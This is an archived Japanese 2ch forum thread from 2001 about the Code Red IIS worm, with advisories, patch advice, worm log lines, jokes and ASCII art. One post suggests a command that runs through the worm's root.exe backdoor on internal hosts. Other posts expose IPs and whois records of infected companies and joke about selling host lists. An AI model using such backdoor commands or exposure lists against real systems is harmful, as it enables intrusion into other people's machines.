鬱だ氏ね！コードレッド(Code Red)

.∧＿∧　　／￣￣￣￣￣￣￣￣￣￣￣￣＼
（　´∀｀）＜　お前らまだやってんのかよ　　　|
.　　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿／

と言われても止めるわけにいかない CodeRed スレ Part4.
ひょっとして 9/30 まで続くのか？
それとも新しい亜種が登場する？ 基本はマターリでお願いします。

〓〓〓 WindowsNT4.0/2000 ユーザーはチェックしよう 〓〓〓
1. ログオンして Ctrl-Alt-Del を押す
2. 「プロセス」タブを選択する
3. Inetinfo.exe プロセスを探す
4. 見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
　　すぐに↓をチェック！
　http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
さらに前↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662

とりあえずここを読め！
Code Red (主にII) 関係のリンク

IPA：「Code Red ワームに関する情報」
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

マイクロソフト：対処方法
http://www.microsoft.com/japan/technet/security/codealrt.asp

橋本 喜代太さん：Code Red II についての警告
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

オランダでの観測と、東アジア爆発の中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg

これ、本スレ？

>>4
前スレの900に人だぁ

>>3
うん。タイトルねた切れでゴメン。

いえいえ、ごくろうさんでした。>>1

コードレッドスレが上位3つ占領してますが・・・

以下転載

＊IISのアンインストール方法＊

１．「スタート」→「設定」→「コントロールパネル」を開きます
２．コントロールパネルの中の「アプリケーションの追加と削除」アイコンを
　　ダブルクリックします
３．新しく表示された画面の左側にある「Windowsコンポーネントの追加と削除」
　　ボタンをクリックします
４．Windowsコンポーネントウィザード画面内の「インターネットインフォ
　　メーションサービス（IIS）」のチェックを外します
５．「次へ」ボタンをクリックし、「完了」ボタンをクリックします

コードレッド (Code Red) 逝ってヨシ ２
は誤爆スレをタイミングよく上げただけだからそのまま下げよう。
ちょっと笑ったけどね。まぎらわしいよ。

CodeRed GIF画と AA書いてくれた人、張るの忘れたｽﾏｿ

>>9
　いきなりアンインストールしろと言われても、IIS使ってるし..(笑)

　　（　´∀｀）＜　さーて、きょうは何をｴｻにしようかな。
　　（　・∀・）＜　やっぱ『赤虫』でしょ！

　　（　´∀｀）／＼，　　＜　何がつれるか ﾀﾉｼﾐ ﾀﾉｼﾐ・・・

　　（　｀∀´）／＼，　　＜　おおｯ!!　入れ食いかよ!!

　　（　＾▽＾）＜　ﾔﾀ!! 今日は大漁だｧ〜!!　もうIISでｸｰﾗｰいっぱい!!

┌─────┐
│ ｳｨｿNT ..　 .│　　　　　　　ルーター
│　 IIS　　 .┏┷┓EtherNet.┏━┓Internet
│(´д｀)　　┃80┠────┨80┠─────（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜
│　　↓ . . ..┗┯┛　　　　　. ┗━┛
│　 ISAPI　 . .│
│　　↓　 .　 . │
│IndexServer│
└─────┘

┌─────┐
│ ｳｨｿNT　　 .│　　　　　　　ルーター
│　 IIS　.　 ┏┷┓　EtherNet　┏━┓Internet
│(´д｀)　　┃80┠（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜
│　　↓　　 ┗┯┛　　　　　　..　┗━┛
│　 ISAPI 　. .│
│　　↓ 　 　 ..│
│IndexServer│
└─────┘

┌────────┐
│ ｳｨｿNT　　　　　　　│　　　　　　　ルーター
│　 IIS　　　　　　　┏┷┓　EtherNet　┏━┓Internet
│（ﾟ∀ﾟCodeRed)ｱﾋｬﾋｬﾋｬ〜〜〜
│　　↓　　　　　　...┗┯┛　　　..　　　　┗━┛
│　 ISAPI　　　　　 .　│
│BufferOverFlow! 　.│
│ 　 　　　 　　 　 　 　│
└────────┘

┌────────┐
│ ｳｨｿNT 　　　　 .　　│　　　　　　　ルーター
│　 IIS　　　　　　　┏┷┓　EtherNet　┏━┓Internet
│（ﾟ∀ﾟ)ｱﾋｬﾋｬﾋｬ（CodeRedﾟ∀ﾟ)ｱﾋｬﾋｬﾋｬ（CodeRedﾟ∀ﾟ)ｱﾋｬﾋｬﾋｬ
│　　↓　　　　.　　 ┗┯┛　　　..　　　　┗━┛
│ 　 ISAPI.　 .　 　 　 │
│BufferOverFlow!. 　│
│　　 .　　　　　　 　 　│
└────────┘

>>12
いやね、zaqてサーバー立てんの禁止してるのよ。
だから、無条件でuninstall。
あと、しらんまにinstallされてる人も居てるからね。

　　┏━━━━━━━━━━━━━━━━━┓
　　┃　 　 コードレッド男爵があらわれた! 　 　 ┃
　　┗━━━━━━━━━━━━━━━━━┛

　　　　　　　|
　　　 ＼／￣￣＼／
　　 ／　| ｀皿´　;::|
　 < <￣| 　 　 /;:::|￣
　　＼＼＼＿/_／＼
　　　 ＼＼　|
　　　　　＼　　 　 ＼
　　　　　　|　　　　|＼＼
　　　　　　＼　　　＼　> >
　　　　　　　　 >　　　|／＼
　　　　　　　 //　　／　　　＼
　　　　　　 //　 ／　　　　　　）
　　　　　 //　/〜〜〜〜〜〜
　　　　 （（　（
　　　　　 ヽ＼＼
　　　　　　　 ヽ＼＼__
　　　　　　　　　 ヽ＼ |
　　　　　　　　　　 しU

>>14
受精シーンにも見える

┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ　　　　　　　 .┃
┃強烈なトラフィック攻撃！　　 　 　 　 ┃
┗━━━━━━━━━━━━━━━┛

　　　　　　　　|
　　　 ＼／￣￣＼／　　／￣￣￣￣￣￣￣￣￣￣
　　　　　|::; ｀皿´　|　　＜　トトトトトトトトト、トラフィック！！
　　　 ￣|:::;ヽ　　　|￣　　＼＿＿＿＿＿＿＿＿＿＿
　　　　　＼__＼_／＼
　　　　　 / 　　　 ＼
　　　　　//|　_　　 ｌ |　　＿
　　　　/| |／　ヽ　 | |／っ､､ヽ
　　　/　＼/⌒゛゛/ ＼/ 　 ```
　　/　　　|　　 /　ヽ。　　　　ヽ。
　/　　　　| 　| |　　　　。　　　　。
　〜〜〜 |　|| |　　　　　。　 　　。
　　　 　　 | / | |　　　　　　ヽ　 　｡　　　｡
　　　　 　//　| |　　　　　　　 　 ＿＿＿
　　　　 //　　| |　　 　　　　　／´∀｀；;::＼　＜グワァァァァ！！重い！！
　　　　//　 　| |　　　　　　 /　　　　/::::::::::|
　　　　U　　　U　　　　　　 | ./|　　/:::::|::::::|
.　　　　　　　　　　　　　　　| |｜／::::::::|::::::|

　　　 　 　 　 ＿ ＿_　　 　＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿_＿_＿_＿_
　 　 　 　 　 ノ, `'-‐┘、 　||￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 く_//　i 　 　 ヽ　||　　　メールして　逆ギレされても　ツブさない
　　 　 　 　 i/　/ﾉ从ﾉ）) 〉 　 ./
. 　 　 　 　 i.V{ fl_|　|.) |/! 　 /　　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 　 'ヽゝ~.ｰ ／ 　 ､/〉　＜　バックドア突いちゃダメ♪
　　　 　 　 　 /＾〈不lヽ　./じ'}　 　 |　マターリとね
　　　　　　　く_　 |/ヽ|. V　f´ 　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　/　)/　.｡i|/{. / ||　　　　　　
. 　 　 　 　 /^Vr 〉=｡||. ‐'　.||
.　　 　 　 /　/〈/　 .｡!!　　　||

>>15
>いやね、zaqてサーバー立てんの禁止してるのよ。
>だから、無条件でuninstall。
　なるほど。

>>17
いや、ある意味受精みたいなもんだ。

前スレの話題だけどInterQの人、まだバックドアあいてるよ。

赤虫達は繁殖している

今帰った遅かった。

http://www.atmarkit.co.jp/fdotnet/wwebserv/wwebserv007/worldwebservice001.html
Code Red感染サーバの国籍を探る

.net で作っちゃうっつーのが．．．

せっかくマスコットにして貰おうと思ったのに・・
http://www.nefty.net/desktop/haritsuke/img-box/img20010810131012.gif
鬱だ

>>26

ｲｲﾈ

>>26
ゴメン…

>>28
スレ盾に間に合わなかった漏れが悪い。

今ここ見たんだけど
http://www.security.nl/misc/codered-stats/
いったい何が起こってるの？
跳ね上がってない？

日本が見えねーぞ
誰のせいだｺﾞﾗｧ

>>30

ホントだ。下の棒グラフのメーター振りきってる。
これって爆発的に拡大してるってこと？

>>30
誤診？凄すぎ

>>30
http://www.security.nl/misc/codered-stats/detailed.html
すっげーよ！！　

>>30
誤診の可能性もあるし、感染力強い亜種の可能性もあるね。
慎重に待機しよっと。

>>30
おいおい、マジかよ…。ポート80念の為に塞いだほうがよさそうだね。

>>30
マジ！？これ！？どうなってんの！！？

>>30
集計スクリプトのバグ？ っぽい気がするが。

誤診だった見たいね
よかったよ。あんなんじゃ・・・鬱

なんか戻ったね。

ありゃりゃ？？？
なんか普通に戻ってたぞ。驚かせるなよｯﾀｸ!!

更新されただけで、ピークの山はあるね。
偶然かな。

よかったけど、なんかちょっと、
寂しいような気もする。

よかったけど、なんかちょっと、
寂しいような気もする。

>>43
惚れたな(~ー~)

しいような気もする。

なんか、ネットワークやってる会社から、Xちゃんが
来ました。もちろん、ディレクトリ丸見え、、、。
なんか、どうなってんのよ？！晒さんと、気付かんな、こいつは。
210.250.212.XXX　

http://www.isa-j.co.jp/outline.html

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.250.212.0
b. [ネットワーク名] ISA-NET
f. [組織名] 株式会社 アイエスエイ
g. [Organization] ISA CO.,Ltd.
m. [運用責任者] TS2806JP
n. [技術連絡担当者] HM082JP
p. [ネームサーバ] ns.jp.psi.net
p. [ネームサーバ] ns2.jp.psi.net
p. [ネームサーバ] ns3.jp.psi.net
y. [通知アドレス] [email protected]
[割当年月日] 1999/04/21
[返却年月日]
[最終更新] 1999/07/16 12:41:21 (JST)
[email protected]

afsafsf

afafsffs

>>47
ここも似たようなモンかな。
外部からのアクセスは弾かれたので内部感染ﾀﾞﾀｰﾘして
意図的にテストしてるのが漏れてるとしたらｺﾞﾗｧだな。
jsat-sv1.jsat.ne.jp

ttp://www.jsat.ne.jp/
a. [ドメイン名] JSAT.NE.JP
b. [ねっとわーくさーびすめい] じぇいさっと
c. [ネットワークサービス名] JSAT
d. [Network Service Name] JSAT
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] MS4926JP
n. [技術連絡担当者] MS4926JP
p. [ネームサーバ] ns1.jsat.ne.jp
p. [ネームサーバ] dns3.dion.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 2000/07/04
[接続年月日] 2000/07/06
[最終更新] 2001/01/26 21:56:02 (JST)
[email protected]

いまも、1分間に、中国、韓国、パキスタンから
がんがん打ち込まれてるし、小一時間前は、
日本の某企業から、がんがん打ち込まれるし、
Xさんって、、、、かなりやばいような、、、。
一号どころじゃないね、これ。

>>47
http://www.isa-j.co.jp/mame/leakage.html
リブトでディレクトリ全開

61.141.GD.CN から来たんだけど偽装？エラー？

たった今M$KKからWin2KPro登録ユーザへの警告メールが届いた。
おせーよ・・・

なんか、プロフェッショナリズムって
なんだろう、、と考えてみる。

>>53
それ、おれのトコにも来てるよ（常連さん）
IP、61かい？

inetnum: 61.140.0.0 - 61.143.255.255
>>53 >>56
ここです。
DNS: 61.141.GD.CN

netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN

>>56
そう今、６１
今見たら１週間前ぐらいにも来てた。
また今日もどさくさにまぎれてＦＴＰにアノニしようとしたやつも。
こっちは全然ちがうＩＰ

>>57
サンクス
なんだラーメン屋か

思えば最初の赤虫の来訪って7/20だったから
もう、20日ぐらい経つんだなぁ。
最初の時は見慣れぬ　NNNNNNNNNNN　にビビった。
良い思いでです。

>>58
anonymous ftp に、中身全部0の "erotic.mpg" とか
置いといてあげれば？

inetnum: 202.108.0.0 - 202.108.255.255
netname: CHINANET-BJ
descr: CHINANET Beijing province network
descr: Data Communication Division
descr: China Telecom
country: CN

>>61
それもおもろいな。
今度morodasi.lzh[解凍すると500Mバイト]とセットで置いとこう。
サンクス

一番最初に来たやつみんなで見ない？
おれこれ
216.25.164.226 - - [20/Jul/2001:01:43:45 +0900] "GET /default.ida?NNNN

おれはこれ。

198.153.129.12 - - [20/Jul/2001:01:49:13 +0900] "GET /default.ida?NNN

頭がなくなっちゃったけどこれ
ホントは１９時ぐらいだったけど　知らないで消してた（ｗ
05.93.130 - - [19/Jul/2001:23:09:25 +0900] "GET /default.ida?NN

そういえば、7月の頭の方で
11:03:00 xxx.x.xxx.xxx - GET /h6}jwu7ssl7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:04:06 xxx.x.xxx.xxx - GET /h6}{}j|vy7uystwt7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:05:20 xxx.x.xxx.xxx - GET /h6kwttws7wtysqr7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:05:22 xxx.x.xxx.xxx - GET /h6j}|qz7wtysqr7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:05:27 xxx.x.xxx.xxx - GET /h6tq~jw7qswt7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
とかいうのがあって、なんじゃこりゃあと
思ったけど、なんだったんかな。

Shift JIS でなんか書いてある感が…

.deだったからドイツ語？

えと、思い切りFAQだろうし、ツールそのものも問題があるのだろうけど、
RedCODEv1
RedCODEv2
RedCODE�U
に感染された／バックドア−作られたかどうかスキャンするツールってありませんかね？
依頼があって、明日中にやられたっぽいマシンを全部駆除しなきゃならんのです。
ポインタとかでもよいので教えてくださいです。ぺこり。

ちなみに某上場企業です

ちなみに、プライベートでクラスBの社内ネットらしい。
ファイアウォールで全部遮断できたはずなんだけど
内部から一気に感染したらしい。
ノートパソコンを持ち込んだ奴がいるらしい。
どーすんだよ・・・

HotmailがCode Redに感染。
http://www.zdnet.co.jp/news/0108/10/e_codered.html

こんな非常時でもｺﾂｺﾂと21を叩いて廻るｱﾒ公ﾏﾝｾｰ

私は
64.55.151.5 - - [20/Jul/2001:06:06:51 +0900] "GET /default.ida?NNN
でした。

>>74
60の間違いでした。

しかし、
何でまた>>70みたいのに頼んだんだ？（藁
その某上場企業。（藁藁

>>70
http://www.symantec.com/region/jp/securitycheck/codered_secutitycheck.html
code red2に対応してるかはしらん。

>>70
ごめん。セキュリティーチェックだった。
探してます。

>>71
CodRedはファイヤーウォール内のＩＩＳサーバーでも外部からアクセスできる状態なら感染するんじゃなかったっけ？

>>70
http://www.symantec.com/region/jp/securitycheck/index.html
ここは？
個々にテストしないといけないから、面倒か(w

>>70
何を今ごろ言ってる。という意見もあると思いますが、重要度によっては
考えなくも有りません。
どんなお立場（SIの保守担当や、企業のシステム部門）で、どの程度の台数
が有るか、そして一番重要な点ですが、その上場企業のお名前を教えてください。
そうしないと答えようが有りません。

うげ、みんな優しいな…（藁

eEyeのが一気に出来るけど、本当に悪用ではなんだろうか。

やっぱ172.16.*.*にパケット送りまくるんだろうか・・・嫌すぎ・・・
ってうちはWin9xが大半で今時社内nukeが効きますけど（ｗ

>>70

内部プライベートだったらとりあえずNATで外へ出る80とめちまえ。
で、インターネットが見れないよん、困るじゃないかボケといわれ
たらproxyを8080とか80以外の適当なポート番号で立てちまえ。で
後でまったり除去しな。

61.*.*.*で日本からの攻撃は確実に少なくなってる。
最近５時間でわずか３匹。
攻撃の全体的な回数はそれほど変化無いけどね。

>>86
日本の場合、通報ﾏﾆｱがいるらしいよ

>>85
８０ポート塞いでも外は見れるよね。

>>70
裏口は
/Intpub/scriptsにroot.exeがあれば確定でしょ？

で、RedCODEv1はリブートすればオッケーだったはず。

どっちにしろ、パッチの当たってないマシンのログみてみれば、わかるでしょ？
パッチ当たってなかったら100％感染するんだから。

>>87
マニアではないが通報（お知らせ）はしてますよ。
一向に改善されてませんが・・・

今日は0時からワームちゃんが169匹きてるよん。

今のところ１時間に10匹ペース。

考えてみたら感染しているかどうかに関わらず対処する
必要があるんだからやっぱ >>70 はおかしいね。

>>70
前スレに「自動駆除ツール」へのリンクがあがってなかったっけ？
調べるだけなら、特定のフォルダに特定のファイルがあるか、
特定のレジストリに特定のキーがあるか、を調べるだけだから、
そんなに難しい話ではないよ。チェックツールぐらい、１時間も
あれば作れるでしょう。

駆除中に愛人にモデムやＰＨＳを使ってでメールをするのも禁止よ

>>70 をバックドア探し厨房と断定します。
よろしいですね。

>>76
研究部門なんですよ。こっちは数値計算関係に特化した出入りの計算屋。
特にネットワーク管理を請け負ってるわけではありません。
ただ頼まれてファイアウォールの設定にかかわった。
>>79
ファイアウォールは7月の段階でdefault.ida付のコネクションを両方とも叩ききるようにしていたので
安心していたのでした。昨日になっていきなり内部から外部へのREDCODEが発生して感染したのを
確認しました。
>>81
そういうわけなので、正式な業務依頼にはならないと思う。
台数は100〜200台かな？個人が勝手に持ち込んだパソコンもいれると見当がつかない。
ちなみに、研究所の別部署ではセキュリティ関係やってたりする（藁）

>>86
１秒間に十回以上来ていたのが、接続し直して、IPが61に変わった途端、
ピタリと止まりました。
また変わったら来るのかな…

>>70
http://172.16.0.0/scripts/root.exe?/c+dir+"c:\"
↑こんなのを、テキストファイルに、その会社の内部IPアドレスの数だけ
テキストファイルに書いて、Iriaとかのダウンロードツールに読み込ませて
一斉にダウンロードをかける。あとは落としたhtmlの中身を見れば、一目瞭然。
（あー、でも、これじゃあファイル名が重複してるから上書きされちゃうか。）

>>96
やろうとしていることは同じことだからそれでいいと思います。
最終的にはBugTraqに流れていたtflindex.cを改造するつもり。

>>97
感染したかどうかに関わらず、パッチを当てないと再感染してしまいます。
なので、>>99ももちろん必要ですが、結局一台一台チェックしないとまずいです。
うんで、パッチがちゃんと当たっているか？を見つけるツールは過去レス参照して
下さい｡

まぁ色々諸事情あると思いますが、頼まれてファイアウォールの設定なんか
お互いの幸せの為にも、やらない方がいいです。

>>99 それはちょっと効率悪すぎ(笑)
普通に内部LANすべてのホストの port80 にスキャンして、
開いてるマシン全部に除去&パッチすればよいのでは？

つか、結局はその２００台全部にSP2あてて、パッチあてて、なんでしょ。
しかも業務依頼にならない……。
お疲れ、御苦労、ご愁傷様……。

>>99
あ、その発想すばらしい。
ファイルの中身見なくても、横からトラフィック監視してれば一発ですね。
その路線でいこうかな。

>>103
そこまではするつもり毛頭ありません
ただ、感染してる奴のコンセントをぼこぼこ引っこ抜いて回るだけ。
それだけで信用関係が保てれば安いもんです。
もちろん、「いずれちゃんとした専門家に任せるんだよ」と
クギはさしておきますです。
商売の邪魔をするつもりはありませんのでご安心を。

iriaは、保存の設定を「構造を再現する」にしておけば、上書きしないよ。
ただし、IP毎に別のフォルダが出来るけど。

>>105
コードレッドの感染力、挙動をご理解の上での発言とは思えません。
過去ログを読んで戴けるとありがたいです。

ついでにみなさんにご朗報：
うちの会社、仕事柄大学にも出入りしているんだけど、大学の総合情報処理センターやら
計算機センターがセキュリティ関係でめろめろになってるみたい。
で、文部科学省の方針で、「セキュリティは事務にまかせる」方針になったようです（国立大学）。
もちろん事務は外注に頼るしかないわけで、ここ数年のうちに
セキュリティ関連会社に大量に依頼が殺到すると思われ。
取ってない会社は即急に入札資格を取っておくほうがよいと思う．

>>108
予算は2兆ぐらい?

なんとなく>>70をうさん臭く感じる人の数->

>>70 は 2ch で遊んでないでさっさと仕事
をしたほうが良いと思われ

>>110
気持はわかるが、こーゆう奴が多いから赤虫大流行です。
ここで７０を叩いても…
ふー。

>>108
大学の総合情報処理センターでアルバイトをしている学生だけど、自分たちで対応したよ。
まだまだ稚拙かもしれないけれど、この程度のことならできるし。
何より計算機屋を目指すものとしてのプライドもあるつもりだよ。
関係ないけど、うちはウェブサーバーを目的にしたIISは1台もなくて、ただ最初から入っていただけだったよ。

うちの大学も全部UNIX系OSだったよ
研究室のPCは学生たちで管理してたし

何故その専門家とやらを、直ぐに召還せんのか？>>70

http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067

自動発見自動削除はこれ？

ディスクトップに"CodeRedに感染してます。"と書かれたフォルダー
ここのアドレスのフォルダー"http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742"
ここは何の掲示板なのでしょうか？

>>117
もしかしてＱちゃん？

>>113
そりゃ出来るよ。ただ、こういうのは、能力の問題じゃなくて、
信用の問題なのよ。アルバイトに１万円払うか、専門の会社に
１００万円払うか、の選択となったら、専門の会社に１００万払
う方を選択するってのが普通。（１万と１００万じゃあ、ちょっ
と大げさか？）例え結果が一緒でもね。
もし、その修復（管理）でなにかトラブルが起きたとき、いった
い誰が責任をとるのか？って話になるのよね。
ばかげた話だと思うところもあるんだけどね。

>>117
InterQ のユーザーさんですか？

>>117
お帰りぃー

>>117
それはあなたがウイルスに感染しているとゆうことです。
>>1のリンク先を全て見てください。

>>117
つか、早く駆除しろ。（藁

>>117
＞ここは何の掲示板なのでしょうか？
なんでそんな奴がsageを知っているんだ？？

でも、＞＞117ってちゃんとsageしてるよね？
文章から見るとココ始めてっぽいけど、どうなん？

fusianasan ってここ使えたっけ？ 170 の IP 確認したいっ！

ネタか

ちょっと火垂るの墓で泣いて来ます。

おっとオレもホタルの墓を見に逝こう

本物の InterQ クン来ないかなぁ...

サゲ知っている位なら、今やキャバ嬢でも沢山いる。
W2K系のOSを使って常時接続している中途半端ユーザに一票（藁

>>117
前スレ見ると
2001/08/10 10:50 <DIR>
このサーバーはCode Redに感染し回り迷惑しています！　及びバックドアが開いております！
早急な処置を！　参照→http：／／ton.2ch.net／sec／index2.html　（／／は半角にしてね）

2001/08/10 11:01 <DIR>
このサーバーはCode Redに感染し回り迷惑しています！　及びバックドアが開いております！

こうゆうフォルダのはずだから、やっぱネタか。

Qちゃんとは別人の可能性も？

Ｑちゃん女子高生画とかｲﾊﾟｰｲ持ってそうだからお友達になりたいYO!

第一、ディスクトップだしな・・・

117再登場きぼ〜ん。

>>117は、ただいま>>1のリンク先を探索中・・・

QちゃんつながらなくなったYO

↓これって、故意と見なしていい？

63.83.50.* - - [10/Aug/2001:22:17:21 +0900] "GET /default.ida?XXXX(省略) HTTP/1.1" 200 639 "-" "Mozilla/4.0 (compatible; MSIE.4.01; Windows NT)"

>>139
手動爆撃？？
見たところアメリカからのようだが・・・

>>139
つーか、キミがそこ見に行ったんじゃないの？
でログをたどって来たと。

結局、相も変わらずDial upで来る奴って

『98使ってるより2000使ってるっていう方が通っぽい』とか
『98より2000の方が新しいの？』とかって勘違いした厨房が
　2000PRO入れて
　　　　　　　　　↓
良く判らんまま割れ物入れて、
　　　　　　　　　↓
そんなんだからIIS勝手にインストールされたのも気付かず、
　　　　　　　　　↓
　　　　　　　赤虫感染
　　　　　　　　　↓
でもlogの見方もわかんないから結局未だ気付かず。
　　　　　　　　　↓
バックドア全開でIPを見せてまわってる。

ってゆうオチか。
なんとかしてくれ。

>>141
行ってないっすよ。

ちなみに、ステータスが200なのは、ダミー置いてるから。(w

>>142
確かに、ただ格好いいからって理由でNT/2000使ってるやつって意外に多い。

特に2000からNT系に入った人はそういうのが・・・

お盆だね。

>>143
ダミーって「赤虫わっしょい」のアレか？

NT4.0向けのパッチ更新されたね。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-033

既製PCのﾌﾟﾘｲﾝｽﾄｰﾙﾓﾃﾞﾙにIISが入っていないのが幸いだ

>>147
違うっす。でも似たようなもんっすね。(w

>>142
未だに、コードレッドがこんなに大変だぁって事すら知らない可能性も
ありおりはべりいまそかり。

話の流れからして70はUNIX系の専門家でしょ
CODEREDの感染力云々・・・ってマジで返す厨房がいるし
おちょくられてんだよ

CODEREDの駆除を業務とか解釈するし
文科系霊感商法は地方にひっこんでるがよろし。

>>152
UNIXの専門家でも、中途半端な技術者はそれはそれはいーっぱいいるよ。
頼まれ仕事でやって良い事と行けないことが区別ついていない時点で、
おちょくって遊ぶ対象じゃん。

あ〜泣いた泣いた。

co.jpはこなくなったねえ。
フレッツ馬鹿とCATV馬鹿はあいかわらずくるけど、日本はそれだけになったYO

>>156
会社がお休みだから、電源落として帰るのが日本の習慣です。
この間に、再インストールして、パッチ当てない馬鹿が沢山いて、
月曜日にLAN内爆発感染して、LAN外に出て行って、
今週の月曜日に戻る。

だめだ。まだ dion から どんどん きます。

時々大量のパケットを投げてくるやつがいたんだけど
昨日からこなくなった。
社内感染が根絶できたのかな。社内全部WIN2000なの
かなあ。
ちなみに京都方面の薬屋さんみたいなんだけど、関係者さん
お疲れ様でした。

>>152
セールスエンジニアと見たね
あえてフォローするなら研究所や学校って営業に来た業者になんでもかんでも頼んでしまおうという傾向がある
おぜぜを出す権限をもっているのが雲の上の人だったりするので話も通りにくい
下手に受注すると現場仕事する人間はハイリスクノーリターン
ちょっと愚痴でした トピずれ御免

つーことで、IIS4ではパッチあててもダメな場合があるそうです。
>　また，これに関連して，IIS 4.0を運用しているサ
>ーバの中には，パッチをインストールしてもオリジナ
>ルのCode Redワームに対して無防備なものがあること
>をマイクロソフトが正式に認めた。SANS Instituteの
>Webサイトで公開された速報によると，サーバがURLリ
>ダイレクションを有効にしていると，バッファオーバ
>ーフローのプロセスの1つがサーバをクラッシュさせ
>てしまうのだという。
>
>　SANSによると，この問題に対する回避策は，サーバ
>からすべてのURLリダイレクションを削除することだ
>という。
>
>　マイクロソフトではこのパッチに対応する，さらな
>る修正の開発を進めている。
http://www.zdnet.co.jp/enterprise/0108/10/01081002.html

コードレッド１→感染力と分散の程度を見る。
広く浅く感染
コードレッド２→感染対象ホストと感染力の修正およびバックドア
狭く激しく感染

って事で、今回の騒ぎで感染対象のマシンで感染しなかった機械は無いと
思われ。そしてその対策が本格的に始まって１週間たった現状これ。

コードレッド３が出てきているらしい.
マイクロソフトはどうするのだ.

2001年8月10日（金） 21時4分
韓国で新種のウィルス「コード・レッド　III」が出現（ロイター）


　［ソウル　１０日　ロイター］　韓国の情報通信省によると、ワーム型コンピューターウイルス「コード・レッド」に、より破壊力の強い新種の「コード・レッド　III」が出現した。
　同省の関係者は、「コード・レッド　III」によるとみられる約１０件の被害が報告された、としている。
　この「コード・レッド　III」型は、これまでの種類より感染速度が更に速いうえ、感染した端末にハッカーの侵入しやすくする「バックドア」をより大きくするという。
　同省の声明によると、「コード・レッド」関連の被害は、国内１万５０００の機関および企業で、計４万３２０１のサーバーの感染が確認されているが、実際の被害状況はこの数字を上回る可能性もあるという。
http://news.yahoo.co.jp/headlines/reu/010810/int/21044701_japan_47819_1.html

あ、すんませんです。
>>152,153の言う話は当たってませんです。
ここで聞いたのは本当に困ったからで、そこまではひねくれていません。
えーせきゅりてぃいいかげんじゃないの？じゃーやってよ、めんどくさい、おーやったるわい
のノリで引き受けてしまったのでした。
今でも専用ツール、探してますです。
飲んで帰ってきたので、iria路線で逝くと思う。

>>154
UNIX系技術者は昔からいいかげんと決まってますし　それがよい味出したりもする

＞＞１６４
爆笑。

<a href="../test/read.cgi?bbs=sec&key=997427742&st=156&to=156&nofirst=true" target="_blank">>>156</a>
そうでもないですよ。
DQN法人ユーザを多数抱えるISPでは、
いまだに警告メールを日に500通は出してますから...

業者に売れば十分なこづかいになりそです。
リストはご丁寧に全世界から送られてきますからne

見苦しくてすみません。

CodeRed�Vってなんか特徴（ログからの見分け方）ありますか？

近頃、AAAAAA......っていうやつがまざってるんだけど。。。。

終わらんな…。

>>70
さっそくリークしてるし。
腹立つのはわからんでもないが
あれだけ言いたいこと言ったんだから
ここでうさはらしてもしょうがないんじゃない？

みぐるしいぜ

確かに最近連続して20発位撃ち込んで来る奴が出てきてるけどログはXXXXXのままだよね
同じIPに数撃ちゃ良いってもんでもなかろうに

止まない雨は、無いじゃない。

明けない夜も、無いじゃない。

けれど一生分からん事は、山ほど有る。

>>161
漏れIIS4.0使っているんだけど、パッチ当ててから時々IISが死ぬので、
なんでかなと思ったが、これだったのか〜。
ありがとう。

でも地球上から戦争が無くなることはないよ

生きてるって、不思議だな。

>>174-179
なんか変な方向に向かってるぞ（ｗ

でも、生きてるってスバラシイよな。

>>170
それ多分eEyeのチェッカー、やっぱ悪用されてるのかな。

赤虫も 漫ろに深ける 夜長哉

なんで蛍すぐ死んでしまうのん?
赤虫は死なへんのに。

>>183 哀しい通り越して虚しくなっちまったじゃないか…

後方Ｒ３度、赤虫は４匹です。

>>183
赤虫はたった24時間の命です。

>>164のコードレッドIIIって コードレッドIIの別名だと思う。

>>187 に追加一票

http://www.rtpro.yamaha.co.jp/RT/FAQ/TCPIP/www-server-vulnerability.html
これって、
赤虫ノック→ルーターリスタート→IIS入っているけど感染しなくてﾖｶｯﾀﾈ
ってこと？？

まぁ他の来訪者にはえらい迷惑だが

コードレッドの正体
http://www.mountaindew.com/code_red/images/ntr_left.gif
コードレッドのスペック
http://www.pepsi.com/current/help/faq/index.html#04b
コードレッドのロゴ
http://www.pepsi.com/current/company_info/images/cr_logo.gif

（ﾓｼｶｼﾃ･･･ｶﾞｲｼｭﾂｶ?)

>>189
赤虫はルータとホストの区別なんか付きませんぜ。
っていうことで、ルータにIISなの？IISなの？攻撃をして
ルータは、いや、あの、その、ちっちがーーー臨終。
って事です。

>>183
地味だが激しくﾜﾗﾀ

>>191
　ちょっと笑った。

>>186
24時間の命、ってことなんだが、うちで観察中の虫は既に72時間以上も
経つのにピンピンしてる。(Win2K server + IIS5)
誰か24時間でrebootするというのを確認した人いる？
ちなみに、Win2K Professional + IIS は確かに24時間でrebootした。

>>183
また泣いてしまった

24時間どころか卵産みまくり

